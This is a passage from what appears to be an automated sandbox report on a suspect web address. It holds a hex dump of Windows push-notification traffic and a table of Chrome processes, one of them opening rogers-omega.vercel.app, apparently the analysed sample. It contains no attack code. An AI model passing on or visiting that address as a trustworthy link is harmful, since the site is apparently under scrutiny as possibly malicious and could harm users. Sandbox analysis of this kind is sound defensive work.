                                                      2024-09-29 05:51:34 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 50 50 57 56 37 76 65 47 4b 30 79 41 4a 6d 6f 32 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 61 61 65 33 35 32 31 34 30 38 36 62 61 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: PPWV7veGK0yAJmo2.3Context: 8caae35214086bac<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                      2024-09-29 05:51:34 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                      Data Ascii: 202 1 CON 58
                                                      2024-09-29 05:51:34 UTC58INData Raw: 4d 53 2d 43 56 3a 20 75 45 73 48 75 39 70 30 76 45 53 67 46 46 52 51 75 74 5a 4c 70 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                      Data Ascii: MS-CV: uEsHu9p0vESgFFRQutZLpg.0Payload parsing failed.


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:01:50:22
                                                      Start date:29/09/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff684c40000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:01:50:27
                                                      Start date:29/09/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=1940,i,5055358492478616502,14363016897838597285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff684c40000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:01:50:30
                                                      Start date:29/09/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://rogers-omega.vercel.app/"
                                                      Imagebase:0x7ff684c40000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly